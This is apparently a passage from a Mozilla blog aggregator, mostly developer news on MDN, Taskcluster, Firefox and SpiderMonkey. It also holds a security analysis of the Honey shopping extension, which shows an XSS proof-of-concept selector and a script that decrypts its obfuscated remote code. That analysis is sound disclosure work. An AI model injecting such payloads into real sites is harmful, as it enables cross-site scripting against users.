So what did we decide? With the initial release of the new platform, we are planning to include all translations of all of the current documents, but in a frozen state. Translations will exist in their own mdn/translated-content repository, to which we will not accept any pull requests. The translations will be shown with a special header that says “This is an archived translation. No more edits are being accepted.” This is a temporary stage until we figure out the next step.

Note: In addition, the text of the UI components and header menu will be in English only, going forward. They will not be translated, at least not initially.

After the initial release, we want to work with you, the community, to figure out the best course of action to move forward with for translations. We would ideally rather not lose localized content on MDN, but we need to fix the technical problems of the past, manage it better, and ensure that the content stays up-to-date.

We will be planning the next phase of MDN localization with the following guiding principles:

  • We should never have outdated localized content on MDN.
  • Manually localizing all MDN content in a huge range of locales seems infeasible, so we should drop that approach.
  • Losing ~20% of traffic is something we should avoid, if possible.

We are making no promises about deliverables or time frames yet, but we have started to think along these lines:

  • Cut down the number of locales we are handling to the top 14 locales that give us 95% of our recorded accept-language headers.
  • Initially include non-editable Machine Learning-based automated translations of the “tier-1” MDN content pages (i.e. a set of the most important MDN content that excludes the vast long tail of articles that get no, or nearly no views). Ideally we’d like to use the existing manual translations to train the Machine Learning system, hopefully getting better results. This is likely to be the first thing we’ll work on in 2021.
  • Regularly update the automated translations as the English content changes, keeping them up-to-date.
  • Start to offer a system whereby we allow community members to improve the automated translations with manual edits. This would require the community to ensure that articles are kept up-to-date with the English versions as they are updated.

Acknowledgements

I’d like to thank my colleagues Schalk Neethling, Ryan Johnson, Peter Bengtsson, Rina Tambo Jensen, Hermina Condei, Melissa Thermidor, and anyone else I’ve forgotten who helped me polish this article with bits of content, feedback, reviews, edits, and more.

The post MDN Web Docs evolves! Lowdown on the upcoming new platform appeared first on Mozilla Hacks - the Web developer blog.

Mike Taylor.www filename flags in web-platform-tests

I added a small feature to web-platform-tests that allows you to load a test automatically on the www subdomain by using a .www filename flag (here’s the original issue).

So like, if you ever need to load a page on a different subdomain to test some kind of origin-y or domainy-y thing, you can just name your test something amazing like origin-y-test.www.html and it will open the test for you at www.web-platform.test (rather than web-platform.test, or similarly, however your system or server is configured).

Now you’ll never need to embed an <iframe> or call window.open() ever again (unless you actually need to do those things).

🎃

Dustin J. MitchellTaskcluster's DB (Part 1) - Azure to Postgres

This is a deep-dive into some of the implementation details of Taskcluster. Taskcluster is a platform for building continuous integration, continuous deployment, and software-release processes. It’s an open source project that began life at Mozilla, supporting the Firefox build, test, and release systems.

The Taskcluster “services” are a collection of microservices that handle distinct tasks: the queue coordinates tasks; the worker-manager creates and manages workers to execute tasks; the auth service authenticates API requests; and so on.

Azure Storage Tables to Postgres

Until April 2020, Taskcluster stored its data in Azure Storage tables, a simple NoSQL-style service similar to AWS’s DynamoDB. Briefly, each Azure table is a list of JSON objects with a single primary key composed of a partition key and a row key. Lookups by primary key are fast and parallelize well, but scans of an entire table are extremely slow and subject to API rate limits. Taskcluster was carefully designed within these constraints, but that meant that some useful operations, such as listing tasks by their task queue ID, were simply not supported. Switching to a fully-relational datastore would enable such operations, while easing deployment of the system for organizations that do not use Azure.

Always Be Migratin’

In April, we migrated the existing deployments of Taskcluster (at that time all within Mozilla) to Postgres. This was a “forklift migration”, in the sense that we moved the data directly into Postgres with minimal modification. Each Azure Storage table was imported into a single Postgres table of the same name, with a fixed structure:

create table queue_tasks_entities(
    partition_key text,
    row_key text,
    value jsonb not null,
    version integer not null,
    etag uuid default public.gen_random_uuid()
);
alter table queue_tasks_entities add primary key (partition_key, row_key);

The importer we used was specially tuned to accomplish this import in a reasonable amount of time (hours). For each known deployment, we scheduled a downtime to perform this migration, after extensive performance testing on development copies.

We considered options to support a downtime-free migration. For example, we could have built an adapter that would read from Postgres and Azure, but write to Postgres. This adapter could support production use of the service while a background process copied data from Azure to Postgres.

This option would have been very complex, especially in supporting some of the atomicity and ordering guarantees that the Taskcluster API relies on. Failures would likely lead to data corruption and a downtime much longer than the simpler, planned downtime. So, we opted for the simpler, planned migration. (we’ll revisit the idea of online migrations in part 3)

The database for Firefox CI occupied about 350GB. The other deployments, such as the community deployment, were much smaller.

Database Interface

All access to Azure Storage tables had been via the azure-entities library, with a limited and very regular interface (hence the _entities suffix on the Postgres table name). We wrote an implementation of the same interface, but with a Postgres backend, in taskcluster-lib-entities. The result was that none of the code in the Taskcluster microservices changed. Not changing code is a great way to avoid introducing new bugs! It also limited the complexity of this change: we only had to deeply understand the semantics of azure-entities, and not the details of how the queue service handles tasks.

Stored Functions

As the taskcluster-lib-entities README indicates, access to each table is via five stored database functions:

  • <tableName>_load - load a single row
  • <tableName>_create - create a new row
  • <tableName>_remove - remove a row
  • <tableName>_modify - modify a row
  • <tableName>_scan - return some or all rows in the table

Stored functions are functions defined in the database itself, that can be redefined within a transaction. Part 2 will get into why we made this choice.

Optimistic Concurrency

The modify function is an interesting case. Azure Storage has no notion of a “transaction”, so the azure-entities library uses an optimistic-concurrency approach to implement atomic updates to rows. This uses the etag column, which changes to a new value on every update, to detect and retry concurrent modifications. While Postgres can do much better, we replicated this behavior in taskcluster-lib-entities, again to limit the changes made and avoid introducing new bugs.

A modification looks like this in Javascript:

await task.modify(task => {
  if (task.status !== 'running') {
    task.status = 'running';
    task.started = now();
  }
});

For those not familiar with JS notation, this is calling the modify method on a task, passing a modifier function which, given a task, modifies that task. The modify method calls the modifier and tries to write the updated row to the database, conditioned on the etag still having the value it did when the task was loaded. If the etag does not match, modify re-loads the row to get the new etag, and tries again until it succeeds. The effect is that updates to the row occur one-at-a-time.

This approach is “optimistic” in the sense that it assumes no conflicts, and does extra work (retrying the modification) only in the unusual case that a conflict occurs.

What’s Next?

At this point, we had fork-lifted Azure tables into Postgres and no longer require an Azure account to run Taskcluster. However, we hadn’t yet seen any of the benefits of a relational database:

  • data fields were still trapped in a JSON object (in fact, some kinds of data were hidden in base64-encoded blobs)
  • each table still only had a single primary key, and queries by any other field would still be prohibitively slow
  • joins between tables would also be prohibitively slow

Part 2 of this series of articles will describe how we addressed these issues. Then part 3 will get into the details of performing large-scale database migrations without downtime.

Mozilla Addons BlogExtensions in Firefox 83

In addition to our brief update on extensions in Firefox 83, this post contains information about changes to the Firefox release calendar and a feature preview for Firefox 84.

Thanks to a contribution from Richa Sharma, the error message logged when a tabs.sendMessage is passed an invalid tabID is now much easier to understand. It had regressed to a generic message due to a previous refactoring.

End of Year Release Calendar

The end of 2020 is approaching (yay?), and as usual people will be taking time off and will be less available. To account for this, the Firefox Release Calendar has been updated to extend the Firefox 85 release cycle by 2 weeks. We will release Firefox 84 on 15 December and Firefox 85 on 26 January. The regular 4-week release cadence should resume after that.

Coming soon in Firefox 84: Manage Optional Permissions in Add-ons Manager

Starting with Firefox 84, currently available on the Nightly pre-release channel, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).

Optional permissions in about:addons

We recommend that extensions using optional permissions listen for the browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.

The post Extensions in Firefox 83 appeared first on Mozilla Add-ons Blog.

Will Kahn-GreeneEverett v1.0.3 released!

What is it?

Everett is a configuration library for Python apps.

Goals of Everett:

  1. flexible configuration from multiple configured environments

  2. easy testing with configuration

  3. easy documentation of configuration for users

From that, Everett has the following features:

  • is composeable and flexible

  • makes it easier to provide helpful error messages for users trying to configure your software

  • supports auto-documentation of configuration with a Sphinx autocomponent directive

  • has an API for testing configuration variations in your tests

  • can pull configuration from a variety of specified sources (environment, INI files, YAML files, dict, write-your-own)

  • supports parsing values (bool, int, lists of things, classes, write-your-own)

  • supports key namespaces

  • supports component architectures

  • works with whatever you're writing--command line tools, web sites, system daemons, etc

v1.0.3 released!

This is a minor maintenance update that fixes a couple of minor bugs, addresses a Sphinx deprecation issue, drops support for Python 3.4 and 3.5, and adds support for Python 3.8 and 3.9 (largely adding those environments to the test suite).

Why you should take a look at Everett

At Mozilla, I'm using Everett for a variety of projects: Mozilla symbols server, Mozilla crash ingestion pipeline, and some other tooling. We use it in a bunch of other places at Mozilla, too.

Everett makes it easy to:

  1. deal with different configurations between local development and server environments

  2. test different configuration values

  3. document configuration options

First-class docs. First-class configuration error help. First-class testing. This is why I created Everett.

If this sounds useful to you, take it for a spin. It's a drop-in replacement for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style of configuration so it's easy to test out.

Enjoy!

Where to go for more

For more specifics on this release, see here: https://everett.readthedocs.io/en/latest/history.html#october-28th-2020

Documentation and quickstart here: https://everett.readthedocs.io/

Source code and issue tracker here: https://github.com/willkg/everett

Wladimir PalantWhat would you risk for free Honey?

Honey is a popular browser extension built by the PayPal subsidiary Honey Science LLC. It promises nothing less than preventing you from wasting money on your online purchases. Whenever possible, it will automatically apply promo codes to your shopping cart, thus saving your money without you lifting a finger. And it even runs a reward program that will give you some money back! Sounds great, what’s the catch?

With such offers, the price you pay is usually your privacy. With Honey, it’s also security. The browser extension is highly reliant on instructions it receives from its server. I found at least four ways for this server to run arbitrary code on any website you visit. So the extension can mutate into spyware or malware at any time, for all users or only for a subset of them – without leaving any traces of the attack like a malicious extension release.

Flies buzzing around an open honeypot, despite the fly swatter nearby.<figcaption> Image credits: Honey, Glitch, Firkin, j4p4n </figcaption>

The trouble with shopping assistants

Please note that there are objective reasons why it’s really hard to build a good shopping assistant. The main issue is how many online shops there are. Honey supports close to 50 thousand shops, yet I easily found a bunch of shops that were missing. Even the shops based on the same engine are typically customized and might have subtle differences in their behavior. Not just that, they will also change without an advance warning. Supporting this zoo is far from trivial.

Add to this the fact that with most of these shops there is very little money to be earned. A shopping assistant needs to work well with Amazon and Shopify. But supporting everything else has to come at close to no cost whatsoever.

The resulting design choices are the perfect recipe for a privacy nightmare:

  • As much server-side configuration as somehow possible, to avoid releasing new extension versions unnecessarily
  • As much data extraction as somehow possible, to avoid manual monitoring of shop changes
  • Bad code quality with many inconsistent approaches, because improving code is costly

I looked into Honey primarily due to its popularity, it being used by more than 17 million users according to the statement on the product’s website. Given the above, I didn’t expect great privacy choices. And while I haven’t seen anything indicating malice, the poor choices made still managed to exceed my expectations by far.

Unique user identifiers

By now you are probably used to reading statements like the following in company’s privacy statements:

None of the information that we collect from these events contains any personally identifiable information (PII) such as names or email addresses.

But of course a persistent semi-random user identifier doesn’t count as “personally identifiable information.” So Honey creates several of those and sends them with every request to its servers:

HTTP headers sent with requests to joinhoney.com

Here you see the exv value in the Cookie header: it is a combination of the extension version, a user ID (bound to the Honey account if any) and a device ID (locally generated random value, stored persistently in the extension data). The same value is also sent with the payload of various requests.

If you are logged into your Honey account, there will also be x-honey-auth-at and x-honey-auth-rt headers. These are an access and a refresh token respectively. It’s not that these are required (the server will produce the same responses regardless) but they once again associate your requests with your Honey account.

So that’s where this Honey privacy statement is clearly wrong: while the data collected doesn’t contain your email address, Honey makes sure to associate it with your account among other things. And the account is tied to your email address. If you were careless enough to enter your name, there will be a name associated with the data as well.

Remote configure everything

Out of the box, the extension won’t know what to do. Before it can do anything at all, it first needs to ask the server which domains it is supposed to be active on. The result is currently a huge list with some of the most popular domains like google.com, bing.com or microsoft.com listed.

Clearly, not all of google.com is an online shop. So when you visit one of the “supported” domains for the first time within a browsing session, the extension will request additional information:

Honey asking its server for shops under the google.com domain

Now the extension knows to ignore all of google.com but the shops listed here. It still doesn’t know anything about the shops however, so when you visit Google Play for example there will be one more request:

Google Play metadata returned by Honey server

The metadata part of the response is most interesting as it determines much of the extension’s behavior on the respective website. For example, there are optional fields pns_siteSelSubId1 to pns_siteSelSubId3 that determine what information the extension sends back to the server later:

Honey sending three empty subid fields to the server

Here the field subid1 and similar are empty because pns_siteSelSubId1 is missing in the store configuration. Were it present, Honey would use it as a CSS selector to find a page element, extract its text and send that text back to the server. Good if somebody wants to know what exactly people are looking at.

Mind you, I only found this functionality enabled on amazon.com and macys.com, yet the selectors provided appear to be outdated and do not match anything. So is this some outdated functionality that is no longer in use and that nobody bothered removing yet? Very likely. Yet it could jump to life any time to collect more detailed information about your browsing habits.

The highly flexible promo code applying process

As you can imagine, the process of applying promo codes can vary wildly between different shops. Yet Honey needs to do it somehow without bothering the user. So while store configuration normally tends to stick to CSS selectors, for this task it will resort to JavaScript code. For example, you get the following configuration for hostgator.com:

Store configuration for hostgator.com containing JavaScript code

The JavaScript code listed under pns_siteRemoveCodeAction or pns_siteSelCartCodeSubmit will be injected into the web page, so it could do anything there: add more items to the cart, change the shipping address or steal your credit card data. Honey requires us to put lots of trust into their web server, isn’t there a better way?

Turns out, Honey actually found one. Allow me to introduce a mechanism labeled as “DAC” internally for reasons I wasn’t yet able to understand:

Honey requesting the DAC script to be applied

The acorn field here contains base64-encoded JSON data. It’s the output of the acorn JavaScript parser: an Abstract Syntax Tree (AST) of some JavaScript code. When reassembled, it turns into this script:

let price = state.startPrice;
try {
    $('#coupon-code').val(code);
    $('#check-coupon').click();
    setTimeout(3000);
    price = $('#preview_total').text();
} catch (_) {
}
resolve({ price });

But Honey doesn’t reassemble the script. Instead, it runs it via a JavaScript-based JavaScript interpreter. This library is explicitly meant to run untrusted code in a sandboxed environment. All one has to do is making sure that the script only gets access to safe functionality.

But you are wondering what this $() function is, aren’t you? It almost looks like jQuery, a library that I called out as a security hazard on multiple occasions. And indeed: Honey chose to expose full jQuery functionality to the sandboxed scripts, thus rendering the sandbox completely useless.

Why did they even bother with this complicated approach? Beats me. I can only imagine that they had trouble with shops using Content Security Policy (CSP) in a way that prohibited execution of arbitrary scripts. So they decided to run the scripts outside the browser where CSP couldn’t stop them.

When selectors aren’t actually selectors

So if the Honey server turned malicious, it would have to enable Honey functionality on the target website, then trick the user into clicking the button to apply promo codes? It could even make that attack more likely to succeed because some of the CSS code styling the button is conveniently served remotely, so the button could be made transparent and spanning the entire page – the user would be bound to click it.

No, that’s still too complicated. Those selectors in the store configuration, what do you think: how are these turned into actual elements? Are you saying document.querySelector()? No, guess again. Is anybody saying “jQuery”? Yes, of course it is using jQuery for extension code as well! And that means that every selector could be potentially booby-trapped.

In the store configuration pictured above, pns_siteSelCartCodeBox field has the selector #coupon-code, [name="coupon"] as its value. What if the server replaces the selector by <img src=x onerror=alert("XSS")>? Exactly, this will happen:

An alert message saying

This message actually appears multiple times because Honey will evaluate this selector a number of times for each page. It does that for any page of a supported store, unconditionally. Remember that whether a site is a supported store or not is determined by the Honey server. So this is a very simple and reliable way for this server to leverage its privileged access to the Honey extension and run arbitrary code on any website (Universal XSS vulnerability).

How about some obfuscation?

Now we have simple and reliable, but isn’t it also too obvious? What if somebody monitors the extension’s network requests? Won’t they notice the odd JavaScript code?

That scenario is rather unlikely actually, e.g. if you look at how long Avast has been spying on their users with barely anybody noticing. But Honey developers are always up to a challenge. And their solution was aptly named “VIM” (no, they definitely don’t mean the editor). Here is one of the requests downloading VIM code for a store:

A request resulting in base64-encoded data in the mainVim field and more in the subVims object

This time, there is no point decoding the base64-encoded data: the result will be binary garbage. As it turns out, the data here has been encrypted using AES, with the start of the string serving as the key. But even after decrypting you won’t be any wiser: the resulting JSON data has all key names replaced by numeric indices and values are once again encrypted.

You need the following script to decrypt the data (requires CryptoJS):

const keys = [
  "alternate", "argument", "arguments", "block", "body", "callee", "cases",
  "computed", "consequent", "constructor", "declaration", "declarations",
  "discriminant", "elements", "expression", "expressions", "finalizer",
  "handler", "id", "init", "key", "kind", "label", "left", "method", "name",
  "object", "operator", "param", "params", "prefix", "properties", "property",
  "quasi", "right", "shorthand", "source", "specifiers", "superClass", "tag",
  "test", "type", "update", "value"
];

function decryptValue(obj)
{
  if (Array.isArray(obj))
    return obj.map(decryptValue);
  if (typeof obj != "object" || !obj)
    return obj;

  let result = {};
  for (let key of Object.keys(obj))
  {
    let value = obj[key];
    if (key.startsWith("_"))
      key = keys[parseInt(key.substr(1), 10)];
    if (typeof value == "string")
      value = CryptoJS.AES.decrypt(value.slice(1), value[0] + "+" + key).toString(CryptoJS.enc.Utf8);
    else
      value = decryptValue(value);
    result[key] = value;
  }
  return result;
}

var data = "<base64 string here>";
data = JSON.parse(CryptoJS.AES.decrypt(data.slice(10), data.slice(0, 10)).toString(CryptoJS.enc.Utf8));
console.log(decryptValue(data));

What you get is once again the Abstract Syntax Tree (AST) of some JavaScript code. The lengthy chunks of JavaScript code are for example categorizing the pages of a shop, determining what kind of logic should apply to these. And the sandboxing is once again ineffective, with the code being provided access to jQuery for example.

So here is a mechanism, providing the server with a simple way to run arbitrary JavaScript code on any website it likes, immediately after the page loads and with sufficient obfuscation that nobody will notice anything odd. Mission accomplished?

Taking over the extension

Almost. So far we were talking about running code in the context of websites. But wouldn’t running code in the context of the extension provide more flexibility? There is a small complication: Content Security Policy (CSP) mechanism disallows running arbitrary JavaScript code in the extension context. At least that’s the case with the Firefox extension due to the Mozilla Add-ons requirements, on Chrome the extension simply relaxed CSP protection.

But that’s not really a problem of course. As we’ve already established, running the code in your own JavaScript interpreter circumvents this protection. And so the Honey extension also has VIM code that will run in the context of the extension’s background page:

The extension requesting VIM code that will run in the background page

It seems that the purpose of this code is extracting user identifiers from various advertising cookies. Here is an excerpt:

var cs = {
    CONTID: {
        name: 'CONTID',
        url: 'https://www.cj.com',
        exVal: null
    },
    s_vi: {
        name: 's_vi',
        url: 'https://www.linkshare.com',
        exVal: null
    },
    _ga: {
        name: '_ga',
        url: 'https://www.rakutenadvertising.com',
        exVal: null
    },
    ...
};

The extension conveniently grants this code access to all cookies on any domains. This is only the case on Chrome however, on Firefox the extension doesn’t request access to cookies. That’s most likely to address concerns that Mozilla Add-ons reviewers had.

The script also has access to jQuery. With the relaxed CSP protection of the Chrome version, this allows it to load any script from paypal.com and some other domains at will. These scripts will be able to do anything that the extension can do: read or change website cookies, track the user’s browsing in arbitrary ways, inject code into websites or even modify server responses.

On Firefox the fallout is more limited. So far I could only think of one rather exotic possibility: add a frame to the extension’s background page. This would allow loading an arbitrary web page that would stay around for the duration of the browsing session while being invisible. This attack could be used for cryptojacking for example.

About that privacy commitment…

The Honey Privacy and Security policy states:

We will be transparent with what data we collect and how we use it to save you time and money, and you can decide if you’re good with that.

This sounds pretty good. But if I still have you here, I want to take a brief look at what this means in practice.

As the privacy policy explains, Honey collects information on availability and prices of items with your help. Opening a single Amazon product page results in numerous requests like the following:

Honey transmitting data about Amazon products to its server

The code responsible for the data sent here is only partly contained in the extension, much of it is loaded from the server:

Obfuscated VIM code returned by Honey server

Yes, this is yet another block of obfuscated VIM code. That’s definitely an unusual way to ensure transparency…

On the bright side, this particular part of Honey functionality can be disabled. That is, if you find the “off” switch. Rather counter-intuitively, this setting is part of your account settings on the Honey website:

The relevant privacy setting is labeled Community Hero

Don’t know about you, but after reading this description I would be no wiser. And if you don’t have a Honey account, it seems that there is no way for you to disable this. Either way, from what I can tell this setting won’t affect other tracking like pns_siteSelSubId1 functionality outlined above.

On a side note, I couldn’t fail to notice one more interesting feature not mentioned in the privacy policy. Honey tracks ad blocker usage, and it will even re-run certain tracking requests from the extension if blocked by an ad blocker. So much for your privacy choices.

Why you should care

In the end, I found that the Honey browser extension gives its server very far reaching privileges, but I did not find any evidence of these privileges being misused. So is it all fine and nothing to worry about? Unfortunately, it’s not that easy.

While the browser extension’s codebase is massive and I certainly didn’t see all of it, it’s possible to make definitive statements about the extension’s behavior. Unfortunately, the same isn’t true for a web server that one can only observe from outside. The fact that I only saw non-malicious responses doesn’t mean that it will stay the same way in future or that other people will make the same experience.

In fact, if the server were to invade users’ privacy or do something outright malicious, it would likely try to avoid detection. One common way is to only do it for accounts that accumulated a certain amount of history. As security researchers like me usually use fairly new accounts, they won’t notice anything. Also, the server might decide to limit such functionality to countries where litigation is less likely. So somebody like me living in Europe with its strict privacy laws won’t see anything, whereas US citizens would have all of their data extracted.

But let’s say that we really trust Honey Science LLC given its great track record. We even trust PayPal who happened to acquire Honey this year. Maybe they really only want to do the right thing, by any means possible. Even then there are still at least two scenarios for you to worry about.

The Honey server infrastructure makes an extremely lucrative target for hackers. Whoever manages to gain control of it will gain control of the browsing experience for all Honey users. They will be able to extract valuable data like credit card numbers, impersonate users (e.g. to commit ad fraud), take over users’ accounts (e.g. to demand ransom) and more. Now think again how much you trust Honey to keep hackers out.

But even if Honey had perfect security, they are also a US-based company. And that means that at any time a three letter agency can ask them for access, and they will have to grant it. That agency might be interested in a particular user, and Honey provides the perfect infrastructure for a targeted attack. Or the agency might want data from all users, something that they are also known to do occasionally. Honey can deliver that as well.

And that’s the reason why Mozilla’s Add-on Policies list the following requirement:

Add-ons must be self-contained and not load remote code for execution

So it’s very surprising that the Honey browser extension in its current form is not merely allowed on Mozilla Add-ons but also marked as “Verified.” I wonder what kind of review process this extension got that none of the remote code execution mechanisms have been detected.

Edit (2020-10-28): As Hubert Figuière pointed out, extensions acquire this “Verified” badge by paying for the review. All the more interesting to learn what kind of review has been paid here.

While Chrome Web Store is more relaxed on this front, their Developer Program Policies also list the following requirement:

Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.

I’d say that the VIM mechanism clearly violates that requirement as well. As I’m still to discover a working mechanism to report violations of Chrome’s Developer Program Policies, it is to be seen whether this will have any consequences.

Patrick Clokedjango-render-block 0.8 (and 0.8.1) released!

A couple of weeks ago I released version 0.8 of django-render-block, this was followed up with a 0.8.1 to fix a regression.

django-render-block is a small library that allows you render a specific block from a Django (or Jinja) template, this is frequently used for emails when …

Spidermonkey Development BlogSpiderMonkey Newsletter 7 (Firefox 82-83)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 82 and 83 Nightly release cycles.

If you like these newsletters, you may also enjoy Yulia’s Compiler Compiler live stream.

🏆 New contributors

  • Yozaam optimized part of our private fields implementation.

👷🏽‍♀️ New features

Firefox 82-83

  • Adam added Reflect[Symbol.toStringTag] and Jeff added Intl[Symbol.toStringTag].

In progress

🚀 WarpBuilder

WarpBuilder is the JIT project to replace the frontend of our optimizing JIT (IonBuilder) and the engine’s Type Inference mechanism with a new MIR builder based on compiling CacheIR to MIR. WarpBuilder will let us improve security, performance, memory usage and maintainability of the whole engine.

We have enabled WarpBuilder by default for Firefox 83 🎉 This resulted in improved responsiveness, page load performance and memory usage. Feedback from Nightly users has been very positive.

A few of the other Warp changes that landed the past months:

🧹 Garbage Collection

  • Jon added a header to dynamic object slots to store the object slot span and capacity.
  • Jon refactored the tracing interface and simplified how slots and elements are stored on the mark stack. These changes will help us experiment with concurrent marking.
  • Jon optimized the GC barrier code.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • Kannan landed the ParserAtom conversion. The frontend no longer depends on the GC to allocate atoms.
  • Ted landed various follow-up optimizations for ParserAtoms.
  • Arai added a browser pref that switches off-thread parsing to use the Stencil format instead of off-thread GC allocations.
  • Kannan added support for serializing the Stencil format to XDR.
  • Arai added support for incremental XDR-encoding.
  • Denis added telemetry probes for JS parsing and execution.
  • Arai updated the Stencil data structures to support moving between threads.
  • Arai cleaned up the interaction of Stencil with delazification.
  • Matthew simplified handling of BigInt properties in the frontend.
  • Ted updated Debugger to compile less when inserting breakpoints.

⚡ WebAssembly

  • Benjamin enabled Cranelift by default for ARM64 hardware in Nightly builds.
  • Lars added support for SIMD instructions on ARM64 to the baseline compiler.
  • Dmitry from Igalia landed more call ABI changes for speeding up indirect calls.

📚 Miscellaneous changes

  • Jason optimized lexical variables in generators and async functions.
  • Tom Ritter added a disnative shell function for disassembling JIT/Wasm code.
  • Nicolas changed the callWithABI interface. This lets us generate ABI tests for each signature.
  • Steve made jsapi-tests faster by letting tests reuse a JS context/global.
  • Iain added a jitsrc command for rr to help debug JIT code.
  • Jeff started splitting up jsfriendapi.h into smaller headers.
  • Jon and André cleaned up many headers, removing a lot of unnecessary #includes.
  • Arai added documentation explaining how async functions and async generators are implemented.
  • Jan and Ryan removed a lot of code for TypedObject. This feature has been non-standard and Nightly-only for years, but the underlying code is now being reused for Wasm GC support.
  • Jon simplified locking for helper thread tasks.
  • Iain cleaned up the bailout code in the Ion backend.
  • Denis made canceling off-thread parse tasks more robust.

The Talospace ProjectFirefox 82 on POWER goes PGO

You'll have noticed this post is rather tardy, since Firefox 82 has been out for the better part of a week, but I wanted to really drill down on a couple variables in our Firefox build configuration for OpenPOWER and also see if it was time to blow away a few persistent assumptions.

But let's not bury the lede here: after several days of screaming, ranting and scaring the cat with various failures, this blog post is finally being typed in a fully profile-guided and link-time optimized Firefox 82 tuned for POWER9 little-endian. Although it multiplies compile time by nearly a factor of 3 and the build process intermittently can consume a terrifying amount of memory, the PGO-LTO build is roughly 25% faster than the LTO-only build, which was already 4% faster than the "baseline" -O3 -mcpu=power9 build. That's worth an 84-minute coffee break! (-j24 on a dual-8 Talos II [64 threads], 64GB RAM.)

The problem with PGO and gcc (at least gcc 10, anyway) is that all the .gcda files end up in the same directory as the built objects in an instrumented build. The build system, which is now heavily clang-centric (despite the docs, gcc is clearly Tier 2, since this and other things don't work), does not know how to handle or transfer the resulting profile data and bombs after running the test load. We don't build with clang because in previous attempts it never managed to fully build the browser on ppc64le and I'm sceptical of its code quality on this platform anyway, but since I wanted to verify against a presumably working configuration I did try a clang build first to see if anything had changed. It breaks fairly early now, interestingly while compiling a Rust component:

4:33.00 error: /home/censored/src/mozilla-release/obj-powerpc64le-unknown-linux-gnu/release/deps/libproc_macro_hack-b7d125d9ae0afae7.so: undefined symbol: __muloti4
4:33.00 --> /home/censored/src/mozilla-release/third_party/rust/phf_macros/src/lib.rs:227:5
4:33.00 227 | #[::proc_macro_hack::proc_macro_hack]
4:33.00    |      ^^^^^^^^^^^^^^^
4:33.00 error: aborting due to previous error
4:33.00 error: could not compile `phf_macros`.

So there's that. I'm not very proficient in Rust so I didn't do much more diagnosis at this point. Back to the hippo gcc.

What's needed is to hack the build system to copy the .gcda files generated during profiling out of instrumented/ into the regular build tree for the actual (second) build phase, which is essentially the solution proposed in bug 1601903 except without any explanation as to how you actually do it. The PGO driver is fortunately in a standalone Python script, so I decided to simply hijack that. At the end is code to coalesce the .profraw files from a successful instrumented clang build, which shouldn't be running anyway if the compiler is gcc, so I threw in a couple lines to terminate instead after it runs this shell script:

#!/bin/csh -f

set where=/tmp/mozgcda.tar

# all on one line yo
cd /home/censored/src/mozilla-release/obj-powerpc64le-unknown-linux-gnu/instrumented || exit
tar cvf $where `find . -name '*.gcda' -print`
cd ..
tar xvf $where
rm -f $where

This repopulates the .gcda files in the right place before we rebuild with the profile data, but because of this subterfuge, gcc thinks the generated profile is not consistent with the source and spams an incredible amount of complaint messages ... which made it difficult to spot the internal compiler error that the profile-guided rebuild triggered. This required another rebuild with some tweaks to turn that off and some other irrelevant warnings (I'll probably upstream at least one of these changes) so I could determine where the ICE was in the scrollback. Fortunately, it was in a test binary, so I just commented it out in the moz.build and it finally stuck. And so far, it's working impressively well. This may well be the fastest the browser can get while still lacking a JIT.

After all that, it's almost an anticlimax to mention that --disable-release is no longer needed in the build configs. You can put it in the Debug configuration if you want, but I now use --enable-release in optimized builds and it seems to work fine.

If you want to try compiling a PGO-LTO build yourself, here is a gist with the changes I made (they are all trivial). Save the shell script above as gccpgostub.csh in ~/src/mozilla-release and/or adjust paths as necessary, and make sure it is chmodded +x. Yes, there is no doubt a more elegant way to do this in Python itself but I hate Python and I was just trying to get it to work. Note that PGO builds can be exceptionally toolchain-dependent (and ICEs more so); while TestUtf8 was what triggered the ICE on my system (Fedora 32, gcc 10.2.1), it is entirely possible it will halt somewhere else in yours, and the PGO command line options may not work the same in earlier versions of the compiler.

Without further ado, the current .mozconfigs, starting with Optimized. Add ac_add_options MOZ_PGO=1 to enable PGO once you have patched your tree and deposited the script.

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-O3 -mcpu=power9"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full

# this is implied by enable-release but left in to be explicit
export RUSTC_OPT_LEVEL=2

Debug

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-Og -mcpu=power9"
ac_add_options --enable-debug
ac_add_options --enable-linker=bfd

export RUSTC_OPT_LEVEL=0

David Telleryoric.steps.next()

The web is getting darker. It is being weaponized by trolls, bullies and bad actors and, as we’ve witnessed, this can have extremely grave consequences for individuals, groups, sometimes entire countries. So far, most of the counter-measures proposed by either governments or private actors are even scarier.

The creators of the Matrix protocol have recently published the most promising plan I have seen. One that I believe stands a chance of making real headway in this fight, while respecting openness, decentralization, open-source and privacy.

I have been offered the opportunity to work on this plan. For this reason, after 9 years as an employee at Mozilla, I’ll be moving to Element, where I’ll try and contribute to making the web a better place. My last day at Mozilla will be October 30th.

Daniel StenbergWorking open source

I work full time on open source and this is how.

Background

I started learning how to program in my teens, well over thirty years ago and I’ve worked as a software engineer and developer since the early 1990s. My first employment as a developer was in 1993. I’ve since worked for and with lots of companies and I’ve worked on a huge amount of (proprietary) software products and devices over many years. Meaning: I certainly didn’t start my life open source. I had to earn it.

When I was 20 years old I did my (then mandatory) military service in Sweden. After having endured that, I applied to the university while at the same time I was offered a job at IBM. I hesitated, but took the job. I figured I could always go to university later – but life took other turns and I never did. I didn’t do a single day of university. I haven’t regretted it.

I learned to code in the mid 80s on a Commodore 64 and software development has been one of my primary hobbies ever since. One thing it taught me well, that I still carry with me, is to spend a few hours per day in front of my home computer.

And then I shipped curl

In the spring of 1998 I renamed my little pet project of the time again and I released the first ever curl release. I have told this story many times, but since then I have spent two hours or so of my spare time on that project – every day for over twenty years. While still working as a software engineer by day.

